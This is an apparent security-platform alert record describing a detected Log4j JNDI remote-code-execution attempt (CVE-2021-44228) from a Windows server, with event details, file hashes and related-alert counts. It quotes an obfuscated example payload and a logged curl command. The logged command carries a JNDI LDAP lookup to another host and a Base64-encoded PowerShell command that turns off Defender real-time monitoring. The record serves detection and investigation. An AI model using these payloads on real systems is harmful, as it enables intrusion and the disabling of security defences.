Apache Log4j2 (JNDI) Remote Code Execution 3

Details

This alert title has been seen 1 times in the last 7 days across Smiths Cogwheels, Inc.

Status:
Status Reason:
None
First Activity:
2024/02/18 12:49:23 UTC (a month ago)
Last Activity:
2024/02/18 12:57:11 UTC (a month ago)
Inserted At:
2024/02/18 12:57:04 UTC (a month ago)
Severity:
High (0.75)
Threat Score:
7.5
Tenant:
Smiths Cogwheels, Inc. (96072)
Detector:
Taegis Watchlist
Tactics:
Initial Access
Sensor Types:
Red Cloak
Confidence:
66%
Username:
Hostname:
Agent/Sensor ID:
Files:
MD5:
SHA1:
Investigations:
This alert has not been added to an investigation.
Occurrence Count:
2
Grouped by (Group Key):
96072:app:event-filter:process:f92ae32a-76c1-47d0-a0f6-5507f3270337:b09b0d11ea98b188bdd2ddc897a73b60:C:\curl\curl.exe:2024-02-14

Affected Agents  (1)

Last Updated:
2024/03/31 13:21:57 UTC
OS Distributor:
Microsoft
OS Family:
WINDOWS
OS Version:
VERSION_SERVER_2016
Most Recent Address:
10.24.22.50 

Open alerts (0) for Related Entities

Open alerts within past 72 hours from alert creation (no data)
Agent/Sensor ID (b09b0d11ea98b188bdd2ddc897a73b60): 0
Files (cmd.exe +1 more): 0
Hostname (WinServ-DB): 0
MD5 (16fae319be8f1e29b2be6fcd5aad9dc2): 0
SHA1 (52bbeefca172e7d38ddf0fae750e3c98549ad3d7): 0
Similar Alert Titles based on Rule ID (f92ae32a-76c1-47d0-a0f6-5507f3270337): 0
Username (WINSERV-DB\Administrator): 0

Closed alerts (69) for Related Entities

Closed alerts within past 30 days from alert creation
Dispositions: Not Actionable (2), True Positive Malicious (48), Suppressed (19)
Agent/Sensor ID (b09b0d11ea98b188bdd2ddc897a73b60): 0
Files (cmd.exe +1 more): 69 total (Not Actionable 2, True Positive Malicious 48, Suppressed 19)
Hostname (WinServ-DB): 0
MD5 (16fae319be8f1e29b2be6fcd5aad9dc2): 0
SHA1 (52bbeefca172e7d38ddf0fae750e3c98549ad3d7): 0
Similar Alert Titles based on Rule ID (f92ae32a-76c1-47d0-a0f6-5507f3270337): 0
Username (WINSERV-DB\Administrator): 0

Open or closed investigations (0) for Related Entities

Open or closed investigations within past 30 days
File Hashes (16fae319be8f1e29b2be6fcd5aad9dc2 +1 more): 0
Files (curl.exe +1 more): 0
Host (b09b0d11ea98b188bdd2ddc897a73b60): 0
User (WINSERV-DB\Administrator): 0
Alert Description
Counter Threat Unit™
A process event was identified whose command line contains the syntax of a Java Naming and Directory Interface (JNDI) lookup. This activity may indicate that a threat actor is attempting to trigger a known remote code execution (RCE) vulnerability, CVE-2021-44228.

Example:
> curl -H X-Api-Version: ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}

JNDI allows software clients to discover and look up data and objects by name. A threat actor can host such objects in various naming or directory services, such as Remote Method Invocation (RMI), Lightweight Directory Access Protocol (LDAP), or the Domain Name System (DNS). An attacker who can control log messages or log message parameters can exploit CVE-2021-44228 to execute arbitrary code loaded from a server (e.g., LDAP) when message lookup substitution is enabled.

External References

Log4j vulnerability CVE-2021-44228 under active exploitation

GitHub | tangxiaofeng7 / CVE-2021-44228-Apache-Log4j-Rce

First Event Details

Process
Command Line:
curl  "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Event Time:
2024/02/18 12:49:23 UTC · a month ago
Ingest Time:
2024/02/18 12:56:55 UTC · a month ago
Process ID:
1856
Image Path:
C:\curl\curl.exe (Admin)
Parent Process ID:
640
Parent Image Path:
C:\Windows\System32\cmd.exe
Username:
WINSERV-DB\Administrator (Admin)
Hostname:
Sensor ID:
b09b0d11ea98b188bdd2ddc897a73b60

Related File Data

File Name:
curl.exe
Process Data (2)

2024/02/18 12:49:23 UTC - Source Event

Command Line:

curl  "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Ingest Time:
2024/02/18 12:56:55 UTC (a month ago)
Parent Image Path:
C:\Windows\System32\cmd.exe
Program Hash MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
Program Hash SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Process ID:
1856
Process Create Time:
2024/02/18 12:49:23 UTC (a month ago)

2024/02/18 12:53:01 UTC

Command Line:

curl  "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Ingest Time:
2024/02/18 12:57:11 UTC (a month ago)
Parent Image Path:
C:\Windows\System32\cmd.exe
Program Hash MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
Program Hash SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Process ID:
1928
Process Create Time:
2024/02/18 12:53:01 UTC (a month ago)